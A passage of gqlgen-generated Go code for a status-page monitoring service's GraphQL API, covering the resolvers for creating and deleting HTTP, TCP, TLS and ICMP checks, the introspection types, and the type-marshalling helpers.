var mutationImplementors = []string{"Mutation"}
func (ec *executionContext) _Mutation(ctx context.Context, sel ast.SelectionSet) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, mutationImplementors)
ctx = graphql.WithFieldContext(ctx, &graphql.FieldContext{
Object: "Mutation",
})
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("Mutation")
case "poll":
out.Values[i] = ec._Mutation_poll(ctx, field)
case "createHttpCheck":
out.Values[i] = ec._Mutation_createHttpCheck(ctx, field)
if out.Values[i] == graphql.Null {
invalids++
}
case "createTcpCheck":
out.Values[i] = ec._Mutation_createTcpCheck(ctx, field)
if out.Values[i] == graphql.Null {
invalids++
}
case "createTlsCheck":
out.Values[i] = ec._Mutation_createTlsCheck(ctx, field)
if out.Values[i] == graphql.Null {
invalids++
}
case "createIcmpCheck":
out.Values[i] = ec._Mutation_createIcmpCheck(ctx, field)
if out.Values[i] == graphql.Null {
invalids++
}
case "deleteCheck":
out.Values[i] = ec._Mutation_deleteCheck(ctx, field)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var pollResultImplementors = []string{"PollResult"}
func (ec *executionContext) _PollResult(ctx context.Context, sel ast.SelectionSet, obj *models.PollResult) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, pollResultImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("PollResult")
case "took":
out.Values[i] = ec._PollResult_took(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var queryImplementors = []string{"Query"}
func (ec *executionContext) _Query(ctx context.Context, sel ast.SelectionSet) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, queryImplementors)
ctx = graphql.WithFieldContext(ctx, &graphql.FieldContext{
Object: "Query",
})
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("Query")
case "checks":
field := field
out.Concurrently(i, func() (res graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
}
}()
res = ec._Query_checks(ctx, field)
return res
})
case "executions":
field := field
out.Concurrently(i, func() (res graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
}
}()
res = ec._Query_executions(ctx, field)
return res
})
case "__type":
out.Values[i] = ec._Query___type(ctx, field)
case "__schema":
out.Values[i] = ec._Query___schema(ctx, field)
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var tcpCheckImplementors = []string{"TcpCheck", "Check"}
func (ec *executionContext) _TcpCheck(ctx context.Context, sel ast.SelectionSet, obj *models.TCPCheck) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, tcpCheckImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("TcpCheck")
case "id":
out.Values[i] = ec._TcpCheck_id(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "identifier":
out.Values[i] = ec._TcpCheck_identifier(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "frecuency":
out.Values[i] = ec._TcpCheck_frecuency(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "address":
out.Values[i] = ec._TcpCheck_address(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "status":
out.Values[i] = ec._TcpCheck_status(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "latestCheck":
out.Values[i] = ec._TcpCheck_latestCheck(ctx, field, obj)
case "message":
out.Values[i] = ec._TcpCheck_message(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "errorMsg":
out.Values[i] = ec._TcpCheck_errorMsg(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var tlsCheckImplementors = []string{"TlsCheck", "Check"}
func (ec *executionContext) _TlsCheck(ctx context.Context, sel ast.SelectionSet, obj *models.TLSCheck) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, tlsCheckImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("TlsCheck")
case "id":
out.Values[i] = ec._TlsCheck_id(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "identifier":
out.Values[i] = ec._TlsCheck_identifier(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "frecuency":
out.Values[i] = ec._TlsCheck_frecuency(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "address":
out.Values[i] = ec._TlsCheck_address(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "status":
out.Values[i] = ec._TlsCheck_status(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "latestCheck":
out.Values[i] = ec._TlsCheck_latestCheck(ctx, field, obj)
case "message":
out.Values[i] = ec._TlsCheck_message(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "errorMsg":
out.Values[i] = ec._TlsCheck_errorMsg(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var __DirectiveImplementors = []string{"__Directive"}
func (ec *executionContext) ___Directive(ctx context.Context, sel ast.SelectionSet, obj *introspection.Directive) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, __DirectiveImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("__Directive")
case "name":
out.Values[i] = ec.___Directive_name(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "description":
out.Values[i] = ec.___Directive_description(ctx, field, obj)
case "locations":
out.Values[i] = ec.___Directive_locations(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "args":
out.Values[i] = ec.___Directive_args(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var __EnumValueImplementors = []string{"__EnumValue"}
func (ec *executionContext) ___EnumValue(ctx context.Context, sel ast.SelectionSet, obj *introspection.EnumValue) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, __EnumValueImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("__EnumValue")
case "name":
out.Values[i] = ec.___EnumValue_name(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "description":
out.Values[i] = ec.___EnumValue_description(ctx, field, obj)
case "isDeprecated":
out.Values[i] = ec.___EnumValue_isDeprecated(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "deprecationReason":
out.Values[i] = ec.___EnumValue_deprecationReason(ctx, field, obj)
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var __FieldImplementors = []string{"__Field"}
func (ec *executionContext) ___Field(ctx context.Context, sel ast.SelectionSet, obj *introspection.Field) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, __FieldImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("__Field")
case "name":
out.Values[i] = ec.___Field_name(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "description":
out.Values[i] = ec.___Field_description(ctx, field, obj)
case "args":
out.Values[i] = ec.___Field_args(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "type":
out.Values[i] = ec.___Field_type(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "isDeprecated":
out.Values[i] = ec.___Field_isDeprecated(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "deprecationReason":
out.Values[i] = ec.___Field_deprecationReason(ctx, field, obj)
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var __InputValueImplementors = []string{"__InputValue"}
func (ec *executionContext) ___InputValue(ctx context.Context, sel ast.SelectionSet, obj *introspection.InputValue) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, __InputValueImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("__InputValue")
case "name":
out.Values[i] = ec.___InputValue_name(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "description":
out.Values[i] = ec.___InputValue_description(ctx, field, obj)
case "type":
out.Values[i] = ec.___InputValue_type(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "defaultValue":
out.Values[i] = ec.___InputValue_defaultValue(ctx, field, obj)
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var __SchemaImplementors = []string{"__Schema"}
func (ec *executionContext) ___Schema(ctx context.Context, sel ast.SelectionSet, obj *introspection.Schema) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, __SchemaImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("__Schema")
case "types":
out.Values[i] = ec.___Schema_types(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "queryType":
out.Values[i] = ec.___Schema_queryType(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "mutationType":
out.Values[i] = ec.___Schema_mutationType(ctx, field, obj)
case "subscriptionType":
out.Values[i] = ec.___Schema_subscriptionType(ctx, field, obj)
case "directives":
out.Values[i] = ec.___Schema_directives(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var __TypeImplementors = []string{"__Type"}
func (ec *executionContext) ___Type(ctx context.Context, sel ast.SelectionSet, obj *introspection.Type) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, __TypeImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("__Type")
case "kind":
out.Values[i] = ec.___Type_kind(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "name":
out.Values[i] = ec.___Type_name(ctx, field, obj)
case "description":
out.Values[i] = ec.___Type_description(ctx, field, obj)
case "fields":
out.Values[i] = ec.___Type_fields(ctx, field, obj)
case "interfaces":
out.Values[i] = ec.___Type_interfaces(ctx, field, obj)
case "possibleTypes":
out.Values[i] = ec.___Type_possibleTypes(ctx, field, obj)
case "enumValues":
out.Values[i] = ec.___Type_enumValues(ctx, field, obj)
case "inputFields":
out.Values[i] = ec.___Type_inputFields(ctx, field, obj)
case "ofType":
out.Values[i] = ec.___Type_ofType(ctx, field, obj)
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
// endregion **************************** object.gotpl ****************************
// region ***************************** type.gotpl *****************************
func (ec *executionContext) unmarshalNBoolean2bool(ctx context.Context, v interface{}) (bool, error) {
res, err := graphql.UnmarshalBoolean(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalNBoolean2bool(ctx context.Context, sel ast.SelectionSet, v bool) graphql.Marshaler {
res := graphql.MarshalBoolean(v)
if res == graphql.Null {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
}
return res
}
func (ec *executionContext) marshalNCheck2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheck(ctx context.Context, sel ast.SelectionSet, v models.Check) graphql.Marshaler {
if v == nil {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
return ec._Check(ctx, sel, v)
}
func (ec *executionContext) marshalNCheckExecution2ᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheckExecution(ctx context.Context, sel ast.SelectionSet, v *models.CheckExecution) graphql.Marshaler {
if v == nil {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
return ec._CheckExecution(ctx, sel, v)
}
func (ec *executionContext) unmarshalNCreateHttpCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateHTTPCheckInput(ctx context.Context, v interface{}) (models.CreateHTTPCheckInput, error) {
res, err := ec.unmarshalInputCreateHttpCheckInput(ctx, v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) unmarshalNCreateIcmpCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateIcmpCheckInput(ctx context.Context, v interface{}) (models.CreateIcmpCheckInput, error) {
res, err := ec.unmarshalInputCreateIcmpCheckInput(ctx, v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) unmarshalNCreateTcpCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateTCPCheckInput(ctx context.Context, v interface{}) (models.CreateTCPCheckInput, error) {
res, err := ec.unmarshalInputCreateTcpCheckInput(ctx, v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) unmarshalNCreateTlsCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateTLSCheckInput(ctx context.Context, v interface{}) (models.CreateTLSCheckInput, error) {
res, err := ec.unmarshalInputCreateTlsCheckInput(ctx, v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalNDeleteResponse2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐDeleteResponse(ctx context.Context, sel ast.SelectionSet, v models.DeleteResponse) graphql.Marshaler {
return ec._DeleteResponse(ctx, sel, &v)
}
func (ec *executionContext) marshalNDeleteResponse2ᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐDeleteResponse(ctx context.Context, sel ast.SelectionSet, v *models.DeleteResponse) graphql.Marshaler {
if v == nil {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
return ec._DeleteResponse(ctx, sel, v)
}
func (ec *executionContext) unmarshalNID2string(ctx context.Context, v interface{}) (string, error) {
res, err := graphql.UnmarshalID(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalNID2string(ctx context.Context, sel ast.SelectionSet, v string) graphql.Marshaler {
res := graphql.MarshalID(v)
if res == graphql.Null {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
}
return res
}
func (ec *executionContext) unmarshalNInt2int(ctx context.Context, v interface{}) (int, error) {
res, err := graphql.UnmarshalInt(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalNInt2int(ctx context.Context, sel ast.SelectionSet, v int) graphql.Marshaler {
res := graphql.MarshalInt(v)
if res == graphql.Null {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
}
return res
}
func (ec *executionContext) unmarshalNString2string(ctx context.Context, v interface{}) (string, error) {
res, err := graphql.UnmarshalString(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalNString2string(ctx context.Context, sel ast.SelectionSet, v string) graphql.Marshaler {
res := graphql.MarshalString(v)
if res == graphql.Null {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
}
return res
}
func (ec *executionContext) unmarshalNTime2timeᚐTime(ctx context.Context, v interface{}) (time.Time, error) {
res, err := graphql.UnmarshalTime(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalNTime2timeᚐTime(ctx context.Context, sel ast.SelectionSet, v time.Time) graphql.Marshaler {
res := graphql.MarshalTime(v)
if res == graphql.Null {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
}
return res
}
func (ec *executionContext) marshalN__Directive2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐDirective(ctx context.Context, sel ast.SelectionSet, v introspection.Directive) graphql.Marshaler {
return ec.___Directive(ctx, sel, &v)
}
func (ec *executionContext) marshalN__Directive2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐDirectiveᚄ(ctx context.Context, sel ast.SelectionSet, v []introspection.Directive) graphql.Marshaler {
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__Directive2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐDirective(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) unmarshalN__DirectiveLocation2string(ctx context.Context, v interface{}) (string, error) {
res, err := graphql.UnmarshalString(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalN__DirectiveLocation2string(ctx context.Context, sel ast.SelectionSet, v string) graphql.Marshaler {
res := graphql.MarshalString(v)
if res == graphql.Null {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
}
return res
}
func (ec *executionContext) unmarshalN__DirectiveLocation2ᚕstringᚄ(ctx context.Context, v interface{}) ([]string, error) {
var vSlice []interface{}
if v != nil {
if tmp1, ok := v.([]interface{}); ok {
vSlice = tmp1
} else {
vSlice = []interface{}{v}
}
}
var err error
res := make([]string, len(vSlice))
for i := range vSlice {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithIndex(i))
res[i], err = ec.unmarshalN__DirectiveLocation2string(ctx, vSlice[i])
if err != nil {
return nil, err
}
}
return res, nil
}
func (ec *executionContext) marshalN__DirectiveLocation2ᚕstringᚄ(ctx context.Context, sel ast.SelectionSet, v []string) graphql.Marshaler {
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__DirectiveLocation2string(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalN__EnumValue2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐEnumValue(ctx context.Context, sel ast.SelectionSet, v introspection.EnumValue) graphql.Marshaler {
return ec.___EnumValue(ctx, sel, &v)
}
func (ec *executionContext) marshalN__Field2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐField(ctx context.Context, sel ast.SelectionSet, v introspection.Field) graphql.Marshaler {
return ec.___Field(ctx, sel, &v)
}
func (ec *executionContext) marshalN__InputValue2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValue(ctx context.Context, sel ast.SelectionSet, v introspection.InputValue) graphql.Marshaler {
return ec.___InputValue(ctx, sel, &v)
}
func (ec *executionContext) marshalN__InputValue2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValueᚄ(ctx context.Context, sel ast.SelectionSet, v []introspection.InputValue) graphql.Marshaler {
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__InputValue2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValue(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalN__Type2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx context.Context, sel ast.SelectionSet, v introspection.Type) graphql.Marshaler {
return ec.___Type(ctx, sel, &v)
}
func (ec *executionContext) marshalN__Type2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐTypeᚄ(ctx context.Context, sel ast.SelectionSet, v []introspection.Type) graphql.Marshaler {
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__Type2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalN__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx context.Context, sel ast.SelectionSet, v *introspection.Type) graphql.Marshaler {
if v == nil {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
return ec.___Type(ctx, sel, v)
}
func (ec *executionContext) unmarshalN__TypeKind2string(ctx context.Context, v interface{}) (string, error) {
res, err := graphql.UnmarshalString(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalN__TypeKind2string(ctx context.Context, sel ast.SelectionSet, v string) graphql.Marshaler {
res := graphql.MarshalString(v)
if res == graphql.Null {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
}
return res
}
func (ec *executionContext) unmarshalOBoolean2bool(ctx context.Context, v interface{}) (bool, error) {
res, err := graphql.UnmarshalBoolean(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalOBoolean2bool(ctx context.Context, sel ast.SelectionSet, v bool) graphql.Marshaler {
return graphql.MarshalBoolean(v)
}
func (ec *executionContext) unmarshalOBoolean2ᚖbool(ctx context.Context, v interface{}) (*bool, error) {
if v == nil {
return nil, nil
}
res, err := graphql.UnmarshalBoolean(v)
return &res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalOBoolean2ᚖbool(ctx context.Context, sel ast.SelectionSet, v *bool) graphql.Marshaler {
if v == nil {
return graphql.Null
}
return graphql.MarshalBoolean(*v)
}
func (ec *executionContext) marshalOCheck2ᚕgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheckᚄ(ctx context.Context, sel ast.SelectionSet, v []models.Check) graphql.Marshaler {
if v == nil {
return graphql.Null
}
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalNCheck2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheck(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalOCheckExecution2ᚕᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheckExecutionᚄ(ctx context.Context, sel ast.SelectionSet, v []*models.CheckExecution) graphql.Marshaler {
if v == nil {
return graphql.Null
}
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalNCheckExecution2ᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheckExecution(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalOPollResult2ᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐPollResult(ctx context.Context, sel ast.SelectionSet, v *models.PollResult) graphql.Marshaler {
if v == nil {
return graphql.Null
}
return ec._PollResult(ctx, sel, v)
}
func (ec *executionContext) unmarshalOString2string(ctx context.Context, v interface{}) (string, error) {
res, err := graphql.UnmarshalString(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalOString2string(ctx context.Context, sel ast.SelectionSet, v string) graphql.Marshaler {
return graphql.MarshalString(v)
}
func (ec *executionContext) unmarshalOString2ᚖstring(ctx context.Context, v interface{}) (*string, error) {
if v == nil {
return nil, nil
}
res, err := graphql.UnmarshalString(v)
return &res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalOString2ᚖstring(ctx context.Context, sel ast.SelectionSet, v *string) graphql.Marshaler {
if v == nil {
return graphql.Null
}
return graphql.MarshalString(*v)
}
func (ec *executionContext) unmarshalOTime2ᚖtimeᚐTime(ctx context.Context, v interface{}) (*time.Time, error) {
if v == nil {
return nil, nil
}
res, err := graphql.UnmarshalTime(v)
return &res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalOTime2ᚖtimeᚐTime(ctx context.Context, sel ast.SelectionSet, v *time.Time) graphql.Marshaler {
if v == nil {
return graphql.Null
}
return graphql.MarshalTime(*v)
}
func (ec *executionContext) marshalO__EnumValue2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐEnumValueᚄ(ctx context.Context, sel ast.SelectionSet, v []introspection.EnumValue) graphql.Marshaler {
if v == nil {
return graphql.Null
}
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__EnumValue2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐEnumValue(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalO__Field2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐFieldᚄ(ctx context.Context, sel ast.SelectionSet, v []introspection.Field) graphql.Marshaler {
if v == nil {
return graphql.Null
}
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
